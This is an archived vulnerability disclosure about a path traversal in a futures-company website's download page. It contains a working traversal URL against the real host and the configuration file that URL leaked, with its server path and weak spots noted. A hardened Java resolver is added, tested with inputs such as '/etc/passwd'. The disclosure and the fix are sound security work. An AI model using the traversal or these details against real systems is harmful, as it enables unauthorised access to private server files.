WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2015-06-05: Details sent to the vendor, awaiting vendor handling
2015-06-09: Vendor confirmed; details disclosed to the vendor only
2015-06-19: Details disclosed to core white hats and relevant domain experts
2015-06-29: Details disclosed to regular white hats
2015-07-09: Details disclosed to intern white hats
2015-07-24: Details disclosed to the public
CITIC Futures! Can the vendor give this a high rank? xoxo
http://www.citicsf.com/download.jsp?fileName=../WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
  <jsp-config>
    <jsp-property-group>
      <url-pattern>*.jspv</url-pattern>
    </jsp-property-group>
  </jsp-config>
  <session-config>
    <session-timeout>60</session-timeout>
  </session-config>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
  <filter>
    <filter-name>SetCharacterEncodingFilter</filter-name>
    <filter-class>struts.annotation.filter.SetCharacterEncodingFilter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>SetCharacterEncodingFilter</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
  <context-param>
    <param-name>siteName</param-name>
    <param-value>中证期货网站</param-value>
  </context-param>
  <context-param>
    <param-name>systemName</param-name>
    <param-value>中证期货网站管理系统</param-value>
  </context-param>
  <context-param>
    <param-name>companyName</param-name>
    <param-value>中证期货</param-value>
  </context-param>
  <context-param>
    <param-name>systemVersion</param-name>
    <param-value>1.0</param-value>
  </context-param>
  <context-param>
    <param-name>pageSize</param-name>
    <param-value>20</param-value>
  </context-param>
  <context-param>
    <param-name>citi_website_url</param-name>
    <param-value>http://www.citicsf.com/</param-value>
  </context-param>
  <!-- Absolute server-side path disclosed by reading this file -->
  <context-param>
    <param-name>citi_website_dir</param-name>
    <param-value>D:/zhongzheng/Java/web_www/web/</param-value>
  </context-param>
  <context-param>
    <param-name>citi_website_ext</param-name>
    <param-value>.shtml</param-value>
  </context-param>
  <context-param>
    <param-name>log_switch</param-name>
    <param-value>1</param-value>
  </context-param>
  <!-- Tomcat form authentication definition -->
  <!-- Note: the /pwd.v and /validatenumber.v mappings below match none of these patterns -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>WebContent</web-resource-name>
      <url-pattern>*.do</url-pattern>
      <url-pattern>*.s</url-pattern>
      <url-pattern>*.html</url-pattern>
      <url-pattern>*.htm</url-pattern>
      <url-pattern>*.jsp</url-pattern>
      <url-pattern>*.jspf</url-pattern>
      <url-pattern>/dwr/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>manager</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>FORM</auth-method>
    <realm-name>web</realm-name>
    <form-login-config>
      <form-login-page>/login.jsp</form-login-page>
      <form-error-page>/login_error.jsp</form-error-page>
    </form-login-config>
  </login-config>
  <!-- Struts and DWR definitions -->
  <servlet>
    <servlet-name>action</servlet-name>
    <servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
    <load-on-startup>2</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>OctetStreamReader</servlet-name>
    <servlet-class>cn.citi.action.OctetStreamReader</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>TreeServlet</servlet-name>
    <servlet-class>cn.citi.action.TreeServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>ValidatenumberServlet</servlet-name>
    <servlet-class>cn.citi.action.ValidatenumberServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>CheckFormServlet</servlet-name>
    <servlet-class>cn.citi.admin.action.CheckFormServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>PwdServlet</servlet-name>
    <servlet-class>cn.citi.action.PwdServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>PwdServlet</servlet-name>
    <url-pattern>/pwd.v</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>ValidatenumberServlet</servlet-name>
    <url-pattern>/validatenumber.v</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>CheckFormServlet</servlet-name>
    <url-pattern>/checkform.s</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>TreeServlet</servlet-name>
    <url-pattern>/tree.s</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>OctetStreamReader</servlet-name>
    <url-pattern>/upload.s</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>action</servlet-name>
    <url-pattern>*.do</url-pattern>
  </servlet-mapping>
  <!-- crossDomainSessionSecurity=false switches off DWR's session-id/cookie CSRF check;
       allowScriptTagRemoting=true additionally permits cross-origin script-tag remoting -->
  <servlet>
    <servlet-name>dwr-invoker</servlet-name>
    <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>false</param-value>
    </init-param>
    <init-param>
      <param-name>allowScriptTagRemoting</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>crossDomainSessionSecurity</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>3</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>dwr-invoker</servlet-name>
    <url-pattern>/dwr/*</url-pattern>
  </servlet-mapping>
  <error-page>
    <error-code>403</error-code>
    <location>/login_error2.jsp</location>
  </error-page>
  <error-page>
    <error-code>404</error-code>
    <location>/login_error3.jsp</location>
  </error-page>
</web-app>
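The bug behind the PoC above is a download handler that joins the fileName parameter onto a directory without confining the result, so `../WEB-INF/web.xml` walks out of the download folder. The following is an added example, not code from the original report or from the citicsf.com application (its download.jsp is not public): it contrasts the naive join with a hardened resolver that canonicalises the path and refuses anything outside the download root, including symlinks planted inside it. The class name, method names and the temporary directory layout are assumptions made for the demonstration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Path-traversal demonstration for a file-download endpoint, written as plain
 * Java (no servlet API) so it compiles and runs stand-alone with only the JDK.
 * Names and the on-disk layout are assumptions for illustration.
 */
public class SafeDownload {

    /** What a naive download.jsp typically does: concatenate and open. */
    static Path unsafeResolve(Path baseDir, String fileName) {
        return Paths.get(baseDir.toString(), fileName);
    }

    /**
     * Hardened resolver. Returns null when the request must be refused:
     * empty or NUL-containing names, absolute paths, anything that
     * normalises to a location outside baseDir, non-regular files, and
     * symlinks whose real target lies outside baseDir.
     */
    static Path safeResolve(Path baseDir, String fileName) throws IOException {
        if (fileName == null || fileName.isEmpty() || fileName.indexOf('\0') >= 0) {
            return null;
        }
        Path base = baseDir.toRealPath();            // canonical root, symlinks resolved
        Path requested = Paths.get(fileName);
        if (requested.isAbsolute()) {
            return null;
        }
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {           // ".." escaped the download root
            return null;
        }
        if (!Files.isRegularFile(candidate)) {
            return null;
        }
        Path real = candidate.toRealPath();          // re-check after symlink resolution
        return real.startsWith(base) ? real : null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: <tmp>/download holds public files, <tmp>/WEB-INF/web.xml is the secret.
        Path root = Files.createTempDirectory("traversal-demo");
        Path downloads = Files.createDirectories(root.resolve("download"));
        Path webInf = Files.createDirectories(root.resolve("WEB-INF"));
        Files.write(downloads.resolve("report.pdf"), "public".getBytes(StandardCharsets.UTF_8));
        Files.write(webInf.resolve("web.xml"), "<web-app/>".getBytes(StandardCharsets.UTF_8));

        String[] requests = {
            "report.pdf",                  // legitimate
            "../WEB-INF/web.xml",          // the PoC from the report
            "sub/../../WEB-INF/web.xml",   // traversal hidden behind a bogus subdirectory
            "/etc/passwd"                  // absolute path
        };
        for (String r : requests) {
            Path naive = unsafeResolve(downloads, r);
            Path safe = safeResolve(downloads, r);
            System.out.printf("%-28s naive-exists=%-5b hardened=%s%n",
                    r, Files.exists(naive),
                    safe == null ? "REJECTED" : downloads.relativize(safe));
        }
    }
}
```

Run with `java SafeDownload.java` (JDK 11+). The naive join reports that `../WEB-INF/web.xml` exists and would serve it; the hardened resolver rejects every request except `report.pdf`. The `startsWith` check is done on `Path` objects, not strings, so a sibling directory such as `download2` cannot pass as a prefix match.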
Could you give this a high rank?
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-06-09 15:02
Thank you very much! The vulnerability has been handled.
None yet